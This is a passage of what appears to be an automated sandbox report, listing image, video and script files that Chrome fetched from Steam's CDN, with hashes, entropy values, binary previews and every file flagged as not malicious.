....F..1U/..!P....+m=2+.h.!M.2.M.n..z..8_i.........H..u.(.^.s(S..5.#.ee.i..RH.A...w..l.4.ud..d..F.yF......._..D.....4H.R.d......qi.....0..i..7......p.cm..WQ.F.L.Q..:..[.2....<.[..... ...&(..hP3..A...n....SU..S...QJw5.j..W)...=.._.....U
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 312x205, components 3
        Category:dropped
        Size (bytes):11100
        Entropy (8bit):7.89198577869451
        Encrypted:false
        SSDEEP:192:J7SAva1ogiBNXXLpMwHn9+GI7LXweaqOmqB9SskTz8SEIW07UvkL:J7F+1ivXdMwdYraZSskUSEimA
        MD5:F4F0B6326C2003EB4402B54C58F94EEA
        SHA1:DB85DADC5D6AF60916109C7A0CBE271E136499AD
        SHA-256:7C5E12F86A8D057BF3CA1E838261E461363078FA52B23628D0D628106D87E5AF
        SHA-512:3FD46E921029E1902DA3F61C81267738A34A9066677BA8963A57D29ADD2D64D0D584DF27DACB9D118227989473BEC5ADB992EF20F4836D45A680A8F29C73DB15
        Malicious:false
        Reputation:low
        Preview:......Exif..II*.................Ducky.......Z.....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:087FE64A8C0311E6AFFD9C9877AAAA54" xmpMM:DocumentID="xmp.did:087FE64B8C0311E6AFFD9C9877AAAA54"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:087FE6488C0311E6AFFD9C9877AAAA54" stRef:documentID="xmp.did:087FE6498C0311E6AFFD9C9877AAAA54"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d....................;...n..+Z....................................................................................................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 52 x 32, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):1304
        Entropy (8bit):6.772235775690999
        Encrypted:false
        SSDEEP:24:11hpunQWwjx82lY2T32HEVfAhyJ3VyZS1Gq3xB/xQ+42tgdUikMxC1bLZ/GThFG:bitNn2VR7J3HBrxO2gK8xC1bLVGTa
        MD5:CEAF33760EC020397F3145A9C908C149
        SHA1:096521D8EED404FBA65D00A3AB80BDB75CC3376A
        SHA-256:F9D757CD0FEE8F9998DEB01AA80051E6D4CF8C348E7597217D647B69F8AFAF2A
        SHA-512:F6FEA151F15EDC820F8F43EB04B89D06ADA58B6DD7EFD4D88B18723086E032A36A2D973C19E1B6448DA982EF3E86002EF76F259A8F3020EB6DF314A44EABAB2F
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/images/v6/ico/ico_singlePlayer.png
        Preview:.PNG........IHDR...4... .....]?[f....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:DDED5249601311E69592F68D70324B45" xmpMM:DocumentID="xmp.did:DDED524A601311E69592F68D70324B45"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:DDED5247601311E69592F68D70324B45" stRef:documentID="xmp.did:DDED5248601311E69592F68D70324B45"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..p.....IDATx.b...?.p.......R..d ..bi.]@....... >@.[A...6.....Z.M.....S@.K(,..../P.r&.D....a.&.`j[N..i.H.y.....Xbm.y..2
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 184x103, components 3
        Category:dropped
        Size (bytes):7883
        Entropy (8bit):7.922453309778931
        Encrypted:false
        SSDEEP:192:Gde3qia6A3eReBU7/x/hTQqcZusoo/FvP8oR9AMBl:HgluReBUFgb/FHfd
        MD5:FD8A95AB89D1AA91774411F0650E25A5
        SHA1:7B7BB3A37DC2C24F4030DBAF5ED47B927F7D4979
        SHA-256:2FE96734860E4CC6C597C25CD583B84F5EC400D2614FE5065DB8FE9F4E10DD01
        SHA-512:2A0786F4C93F39D8E6C53284701F03FD2374C370E2D829BACE0720FFF603B0D6FEC2D7995A3B1A39EE92E3A17D8196D06381859FCBA06FFAEF40AB3C2FA28216
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................g.............................................C..........................!..1A"Qa..q.#2B.........Rb.....$%CDTrs................................0.....................!..1.A."Qa..q.#2B...Rb..............?..e>:./J..._.=O.B...y(..H._..q....Lx..[.....=....g...3...!f(2.6}.y.....j.F.M&.C.....4............@..e.._z......|...\.=.%..b......@7#!T..I.E*.x.....2`...km<C....I*....N....N....#.T..T?.Up...2m.....-..%E...u.>..VI..d.*...r.Dem..o......Q.L...Qe.*....V....X. .B...Y.=...BI.**.~-.G...L.3SA3.....!...[i..&.......alefw.....Sh.%..#.."<..:ayf..T.r...o(.._.Oss.]...He.UB.[....d..V.8.E..mm]v...U....,...}Hm%..d......Y...%6.akY&.TmoK.|U&!e1.~..m.6..;...7.....l.G^5...Il.\......*..o...Q.....1...PA.... ....\c..0m...6M.l.......d..X..7.r/.Y...j/...DZ.XaJSe:..{..db..91. ...n.3Si..E\r........&..(W..fR.!%7#Q..b..i.......)R.!W
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:WebM
        Category:downloaded
        Size (bytes):1048576
        Entropy (8bit):7.99949961983333
        Encrypted:true
        SSDEEP:24576:Bo9kP4U5vcjUMnMdz1m5FDKkKMO5ebwOggyUOo:y90Tv2nMdzc5kk+M5ntr
        MD5:631C14B77952F158486EF576391D61D9
        SHA1:B9E7C2DD3D3EAFBAEB6B6BCA9472BFA270189197
        SHA-256:0448E79783554DC6C170E5BEDEFCE5DA4B8E1589AD065C14EB1797408441E6D1
        SHA-512:A9F6CDD0D6007E67AFEA3B3B16FA7C3D3D8682BAFAA2E967777B41B47D4CD0A01C6E986A0688F99C04CD1F76E5673808EEB4EB0FF2B3ACDEE51DF7B96B5695C2
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/clusters/frontpage/eb193c51e2c473096f72216e/webm_page_bg_english.webm?t=1716506545:2f77e586e7d3b8:0
        Preview:.E..B...B...B..B..B..webmB...B....S.g.....%...M.t.M..S...I.fS..nM..S...T.kS...M..S...C.uS...SM..S...S.kS..%................................................I.f.*...B@D..E...Da..>...M..libwebm-0.3.0.0WA.fnord WebM for Premiere, built Jun 1 2022.T.k@.....s.....7*4.....V_VP9.....:....#..A...U..U...U...U.......s." .pN!....V..c..V.......A_OPUSc..OpusHead..8..........G;......C.u.......[............"A.....I.B.s....8$.."..`.........?.O.................?........G.........?..g.w..........S..../..r...__.?..G.......c.G../.?...p?.........._....M/.?...=w.>P_.z../.o..c........=G.......b.../....U..O..[..W...>.G..\.W..^.B.9.....W...../.oE....{..?...?...._G.......q.?..+..w...._o~"T......\f6...a.D.S..#.7...pZ/...*.^....z.K._...6z_.X\..b..}9..{0.......pAkW......-..-. .v.[.)*c.._...f.T7.Un!....$.l.V...B.....'.st..._.]..}:f...~>!....7.\...2........./...c.L0]m....Qn.D...PM....).U.Q.2.BL.1...R..~8$.Z.f.7.[...'..<........lY<W....o.%uE.....O.z........5...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:downloaded
        Size (bytes):2733
        Entropy (8bit):7.784003064465458
        Encrypted:false
        SSDEEP:48:vhqnAmopEVAtBt2YgYG833N4vGFvXlXF6PCAoQ1nE1T85i2H4r3:vQnAnBIVDvSlVuCA7E1T8Y26
        MD5:B71F42F3168B16957C8393EFB6B68221
        SHA1:6215711F6C95E61E5F211C5952A9A9CFA6604372
        SHA-256:55E5E3F5F947D0C603508241AD655B6437AA0AE961CADE3A822097044815B23F
        SHA-512:ED80B4F7ADCE853921520D333550951530AD5C10C1BAF57F3ADADAF95225D269A874EA34FADF089E756D0617C709532E85AE4EF45C3A85C18A63336D1D5D53CD
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/ss_bb0d9a5b981ada1e0045cc49327e2cc26566766f.116x65.jpg?t=1705420866
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s............................................:........................!..1.AQaq."2....#...34Bbrs$5R..................................*.......................!1..AQ"2..BqCa...............?..l.......w...;T!.;..B......X\i.....d.S....g.c^...cq.p.Z..:b..Y..X...t..c.95..o''....X..{o..x<W......5.M..g....e..W....R|...Z....b..n...|(.X@..p.'.. n..kW.(.P@&...t...cV.e..zL=9.......g......L..I.>>J..e.....m\..;..F.D..G6}@5.....P..T......wQ!.Cn..@.i.m...l.DVZ...{.F..(.....4.SN....v...-.....[..Rs.....T..3c.9..X!.<.......wV._.._...~.K.L.......z..[.g.........vi.P}i..M/es........Zl|..k.1..D..NF....*.....Sg...7.8......(.w.<.`7.s...:9q...]..s.n....p.~t.<..q...C}.Mr$..l..9c...N\.c...]EaE@...j..m,....Y.$.!'.S.TT Lr..*.x.P.m.=......n2...B..cB..5H.c.Y. ....7..})'=.)].\...S....~U.U). ..;.g....w&.M.-.J.5V......9Q.>.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):11386
        Entropy (8bit):7.945456271396874
        Encrypted:false
        SSDEEP:192:AsQWVoCK2mOpgWlO3oah3k7PJH9l/JUNZAHm2lQflodGNjY/lH5qq10m7zhFgvyc:Ah2o27s3oahk7PJHL/CHlSdMjY/R5P10
        MD5:2C4853B1A11A4D43959FEAFDC4D8385B
        SHA1:54F539BC34B0FC6DB23E4EB9AEBF1CF7B0E2CF5E
        SHA-256:DC7E6315D504A72691BF124B529FFB9326A7AE1243CB555B2E0A2AD6A7725E91
        SHA-512:C27F828D30171DFC95CF4459E90CE1F91D8CAD57375DF4DAD544B06F50B3F804A3DF472D3795EF6153EF9635A658C67FF60982D6684D2EB1940D217D19B8B344
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1151340/capsule_184x69.jpg?t=1715689493
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................;..........................!..1A.."Qa2.#q...3BR...b....t...................................=.......................!1A..Qa"q........2...#B..Rr...bs................?..*.......s]...z.7(..]w......1........d)...>.....~.PH.Q9......d8V.].....P..o......:....5.~..s..-T.[.Bc.J..RF..\u7..$..i.}+(..x...y.@=.:.R..I..4.....q...m.}........f^e9)J......:. .Q.eY..J-....#d%.$...*........)..I.W:H..i.u..|..S!TWY............{.n..".n.W.....G~.|...Z....$D 4.Tn..$.~.c...oSK8.'.H.k.1.s.4........Y.$)B.......R...-Nr.0....T.^.>.1P..P......].u.` `...C..8yF.a...>t.&..n8...|.)..v.,HH.....i[.&4Wc..?.^.s.....J...t......."..u.I.=....z.h....J.D..4..6TB.7......+ F..T..n@.@..dgQ'..u....M..?AR...}W=E......Z.G.u.....F..]tJw. .I;.7.|.W"1N...,E.q......$X....N.gM..p..}.=...X...U...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):6568
        Entropy (8bit):7.926040560239071
        Encrypted:false
        SSDEEP:192:gRsNKDDuOI3B+AhEbVJoklDHW9B0zGJB3uzV:ssSViC9HWz008zV
        MD5:E109F7B419A6DB3148F635B9042AE1C8
        SHA1:0C1A9E47DB424E1F5ED70AA2FE7E25D6B865BDBE
        SHA-256:E52BD14D28698E0586930AAB172E8B99B268A14E8FEFD339DD013F0BDB2BC1C0
        SHA-512:8CE5B3235B726A266E87EC15BF3A37982A6F6740548ACCD4ACF0E117C36C6CA0A6B5C4C7014FDEEC20C06BFD4EA98FD094F9C10E0F9EC1C37B71CF6731BB3297
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/730/capsule_184x69.jpg?t=1716504320
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................@...........................!1A.."Q.aq#2....Bb...3CR....G.......................................>........................!1.AQaq.."..2B.....T...#RSr...&3d...............?...V.I<..\._..(....TI$...8...w{.;.....[.bx....Zt...3.R.......'isa.R...!\p.clc..F.h...,L....Z2..........e....Na..... $.Gae'.E..,..g.u9........F....>...Z..p.....x.EZ.......QN...I.m..q8.b....@.R.m......n......V`N\..:...\`{.B?..K..7.L..P.;...V.V..3..bw...a.:..I2..s"=T...DXl.!o9.Q*...I......i3ky>..q...J..SQ.J...}......#...uB.U....?.K..G...,P......I...k.r..~..6v<.t....#..t.}...bL....;.?52.zp1.+......`B.c....y....p1+E......%.\.H.<R..HJv...D.g....0!..B.c.vB.DRs....O8..Is.h.lU.\.D..E..V./3.v4.n.1&..kL.i..,e..%.%.. .cp...+.o..b.?&LXD....MlG.;....l.&.......[...p.#z.....32.7N.....*.m{cF....9.V...u.ma
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 600 x 240, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):255965
        Entropy (8bit):7.985391501127512
        Encrypted:false
        SSDEEP:6144:Mk1ZbR6whKB8TV5IKujB3BIXACfZHmeCmuCwNKN2BT:rQwhg8crBxIXB5meSvBT
        MD5:54C7D23B606471F39331C9CC9095826E
        SHA1:4EDEEAD000DD560E2B3748FC38A2B74D2D8EF4CA
        SHA-256:2905C03D32FD735C2FD73E5CF5546458084BA2108903DA50FFC3BB76207F937F
        SHA-512:333222441DC4AE146576CDDA7A564BAB32C2B3B86E9C5367FC1B7C1C8B5A38434D12C1A515187D6237D73FCF48395E41C7B5D189F4F21DB29224F96A7C410AD4
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/extras/dtoid.png?t=1705420866
        Preview:.PNG........IHDR...X...........v....pHYs................)iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop 22.4 (Windows)" xmp:CreateDate="2021-08-02T17:48:06+03:00" xmp:MetadataDate="2021-08-03T14:24:41+03:00" xmp:ModifyDate="2021-08-03T14:24:41+03:00" dc:format="image/png" xmpMM:InstanceID="xmp.iid:a98b8574-e051-d645-a875-428d30b95bac" xmpMM:DocumentID="adobe:docid:photoshop:4a9a7876-e9ed-a440-964a-0f31e67df2fc" xmp
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 52 x 32, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):1127
        Entropy (8bit):6.430139088018347
        Encrypted:false
        SSDEEP:24:Iy1he91Wwjx82lY2T3ouVBTyJ3VrmmGQ6OuRji/yPP:IwqQNn2xiJ3dI1RjiaPP
        MD5:ACEE12334C5438C439DEF6F937F8FA88
        SHA1:CBBF31B7B4131C3B7669CB6916C6D8AB28A25465
        SHA-256:4E2AC4609F7FFEBC2B6379D0FF0B24759457D442BE87B8567DEB9B0EF1205C3F
        SHA-512:93B94BC83C0EB3C6CEB3206F41031A90BECBBDBFEFDE473248304936397F0572660B9EFA90132469DD7BE20E2D2817E91A341DF19CDCD0617649A72A1C54A03F
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...4... .....]?[f....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:07E06082E2BC11E3A3F5FC66991AB4CD" xmpMM:DocumentID="xmp.did:07E06083E2BC11E3A3F5FC66991AB4CD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:07E06080E2BC11E3A3F5FC66991AB4CD" stRef:documentID="xmp.did:07E06081E2BC11E3A3F5FC66991AB4CD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx.b...?.p.....f....N4p.q ..........W..?......'*x..........,.<...c..!....HlP`..o.1.`..).V..y......F.x.$9..Q
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):6047
        Entropy (8bit):7.910148285734931
        Encrypted:false
        SSDEEP:96:H1POxfEIhgnNm7rBb1RBUsslsnTHOfnP3qVXdCGaJfF0SH:H9mfEIh8eV1crOTHOvoXs/JffH
        MD5:4CA61F59528D4C3C595210687BEA09DB
        SHA1:4CD03D1482D9BC226A28E5BEF2E376239DEED040
        SHA-256:5B1FE120FE756E3D964DCD39B073E0B8C4F918018FBE2E73443CF6AE86613459
        SHA-512:19F96961E48B96D867A027889D5A79AFE6FAA8498FA8EC10A1DBB9C65A2721F9072FA30F25F8BD931E093A1DCBDB67097BC33AEB63C82AF20573F59E77890C1C
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................;...........................!.1A.."Q#2a.B....3Rb....$q....................................2.......................!.1AQ.."aq......2...$..#R............?.....}W.k..U%...OH_.l#.k?.O..li.O...-ccO*j....q..........aRe.~$.?..O.}....X.............Z. ...{b.....h%2b!.;..9s% d.........Z.I..vJ....V;....ne'l...K.<..,4+.H_.}..W..s.~^]x..O...yu...._.p..~....Z......-...e......?S.?...M.c....&.e..9..p...4....h.@.....4....h.@...h..7...f,..SYu`=6N|...g........}..c.6..K_7.T1..WL......l....Yu..f.t"j.mN..d..'...}.;...yO..i....y........f.O.7.......?.z}F..<.YO.1%.. ..G..,....~.:...J6].vO...........F.ykZO..........L.Z....[.+).........G....H.y..A.}."\... .......wWo{..x...H,..).m.....w..=.y.....ol.....e..Ex..P......3.........8.....cX0`......{..#>.......g=...q.t2e-.{.=..t`....IZ.Z.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with very long lines (57851), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):58046
        Entropy (8bit):5.004825187457945
        Encrypted:false
        SSDEEP:1536:s7aiXrClR0oLeh4iS726I7CsrpzAuIRmE:EklR1Leh4iS79I7CsmuIRmE
        MD5:8D4A5EA4013FD55EF27F1427DA71432B
        SHA1:0F9D4FBEB0EBA5477665AD31CB3D135CBFE5FFDD
        SHA-256:542CC3E6E4DAA5960A449A35A22D159CB9F70C45339C8F4C6E920758C4D821A9
        SHA-512:BCAF35FCA5F7605426176C5C523D582408EEDD930E4AE75ABC552BF63568BB2C01E6E313DA70913D29001F9E3BBDAE7D4D1F16B94E4B3F22537CD9E7CD5340DA
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/javascript/applications/store/main_english-json.js?contenthash=6c5add9f48c608fe2aaa
        Preview:.........../**** (c) Valve Corporation. Use is governed by the terms of the Steam Subscriber Agreement http://store.steampowered.com/subscriber_agreement/. ..****/.."use strict";(self.webpackChunkstore=self.webpackChunkstore||[]).push([[6815],{63336:e=>{e.exports=JSON.parse('{"language":"english","CuratorAdmin_RSSFeed_title":"Manage my RSS Feeds","CuratorAdmin_RSSFeed_desc":"Setting up RSS feeds allows you to automate the Steam Events and Announcement creation from your existing content management platform. Your content from your site will automatically surface to Steam customers who follow you as News. ","CuratorAdmin_RSSFeed_lang_only":"Feed Language:","CuratorAdmin_Curator_lang_only":"NOTE: The curator is set to %1$s language which is different from the feed language of %2$s. Re-save the feed to update to this language.","CuratorAdmin_RSSFeed_lang":"The language is set on the group to \'%1$s\'. If this is not correct, you can edit the group profile and then re-setup this feed.","Cu
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):1139
        Entropy (8bit):6.532046828421671
        Encrypted:false
        SSDEEP:24:c1hpunQWwjx82lY2T32HEVy1CaKyJ3VGFG6i5NKkNhbOlNvIP7:CitNn2VpMJ3mMTxkY
        MD5:FAC3C1AF93D191D52892FF42E66AE70B
        SHA1:A3D5AC838B61D1B8231D91C7E5492771A452110A
        SHA-256:D87DD24DE2B24AFAA384DD663A471AF4843EA35C40D5FFB325019EB458DFD8C5
        SHA-512:4AF94AF01D40D18A97DC3213E79F308E6C30B11536CC9E4BE8BBDA041F96A52C83816E0847D94A54783D829C272AE8BCB29E8231FBFDE66BA68E3EB57A7211E9
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:EAD87E4B4CB311E3BF759EB643A791F7" xmpMM:DocumentID="xmp.did:EAD87E4C4CB311E3BF759EB643A791F7"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:EAD87E494CB311E3BF759EB643A791F7" stRef:documentID="xmp.did:EAD87E4A4CB311E3BF759EB643A791F7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..).....IDATx...?.AQ..qW.$eS.2.............l."...H,..^..BI8.r&.u...<...._...R..f.n.z..B1...4N...B=..F`Q....4.j..(!...H.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):6498
        Entropy (8bit):7.920571241657577
        Encrypted:false
        SSDEEP:96:n1qK0mnLvsBqNFLYOHyIwZCfnfmHuEdjDOJVgL53NK/xbwqhqgp7o4rm+pkow:1qKdJNRHmZCGHfFSY3ubnMgJtm+phw
        MD5:F5100E110F7D673CAA7819D4CD60986B
        SHA1:9079A6FACDCE761BDBC73801344179B60BD04D38
        SHA-256:E47500FC3710B8AB505F8F4B71D7601D9E4DAA8496EBC1AE39064D291C62A573
        SHA-512:2C0E84E3B295EEE8D10874360BC92369B9FC1A17F25B54C48F20389C52EC97EA20060358C62F134A229A03577B69AE6EDA87A468559FF78A8694CB65412DDF96
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................@..........................!.1.."A.Q..#2aq..B..$4Rs.....6rtu.....................................=.......................!..1AQ."aq.2......#B...34r..$5Rst...............?..}p..IbFG#X.[..e.~....<...k-[.V.efuJb....=*-..V..*?!....8....}...k.z..H.46.\7=.[..A.}.-.F~3a.ZI>....q..n.2..T.6b...EQ..B..^.;7....K.ypNa.s..e%.#..4w+ca@..O.......u.>.N.&...r..B.[..i..QT.AVh...I..^.c......!j.iu...%...gX+`l..9....y...:.I....%......../.H..!-.KB........A...'~I|...`-.&..%`..t.M..M<.Z..Tv.'s*D.K.m.[+.@|.:..*.%.;.....H..\..6.k.9</.o..j...jZ.8.]....Jf.]hHS......I....].N...#...-.f..@.=0.........%+.....+m.....8 ~:rj._......&k.v.|...{P...cE..F.q.....<.;.:8=;.#.@'.V....h.9.`.o..78.U:..`.4..H.T....~.YXH.h..9.S.Qp.+....8*..|..2P.7.:v..y.M(`.n..X.=.,$5...8.X[.e..&.>)}K..j..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 460x215, components 3
        Category:downloaded
        Size (bytes):37275
        Entropy (8bit):7.980118744288342
        Encrypted:false
        SSDEEP:768:Q1XiwSXD4QpyHQQbOld6o8aHO2a4UoXmt000yJnTQ:EXizvE636zv7ou0fyJ8
        MD5:5DF1846F35506EA230009C57772749AD
        SHA1:73DF5A4DE1F1965CDE8B233BC40EA4D601FCD0B6
        SHA-256:E85E5B07A83662F2A030837D7459A3937B1256459E2325F932DECE12A322227E
        SHA-512:23A76B339CEC5DCBAE86321310B06B68B943F04FF929834E5CB3190B4A8450EF5D0FA81B40810C03E178F477989318C6DE2F9B70A6EEDCC10F72845349C1724A
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/header.jpg?t=1705420866
        Preview:......JFIF.............C....................................................................C......................................................................................................................G..........................!.1."AQ..aq2....#B..$R...3b...4r....5CS.cs..................................;........................!1A"Q..a.2q........#B...3RCbr..$S............?..u.a..e..B.k..%...G3..N....H.m...0,d....$n;...5.ai|Q.I.....!,.Sg2.v.T.X.F...Y.z...).......V.........@.{r-l..#)2gBx...`.......@...+..F.....\....&.o(...=..=.d.#..=;.+.(-....]...{....;.Q.5.T....|..f.....O<.....E......tu&..L).Kv....8...>..z..&......3.@ll0y+c.#e....HK..h. .`.0.]Q#).........`~...F8..N7X.!B..UG......2..wPmka...Uky......J......@.`-.5.....i.......\...{..!.%Tpp...rt<c.Z.......6t1..;L...v&G.........su.......{..8.A..[....:..~.l....3........4.....+)..P+..........pt...AU[..n..nm.|r2d.....~/.9.2.......t.#.2...9.2.k.P.>.0.zX..i...P.....J.%.N..L{.....j.^8R.F..m..m~.6......s%........2.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):1161
        Entropy (8bit):6.483902966293242
        Encrypted:false
        SSDEEP:24:2C1hkyaWwjx82lY2T3RVNxhpyJ3Vlt8vmG8ll6f7iX:HZNn2lPzoJ3PtQmBY0
        MD5:E406E5A22E4F3CFA580D3BB57420150E
        SHA1:5B381E535BB0CE6003A461F3124FA1238DFBCEDB
        SHA-256:760589F903C5E9BD169B38F941F9A3DC88A23897E9CC5B622D3D91F5C204B9E4
        SHA-512:E33CB7BD10104A1E8C2D3F2B3885D65EF3769F7250445C8341D6D2AD2367749CCDC48DAABE4EA39CB80EE0362AF9D01E48370DB858BA01F956A1A6B8C04217C1
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/images/ico/ico_facebook.png
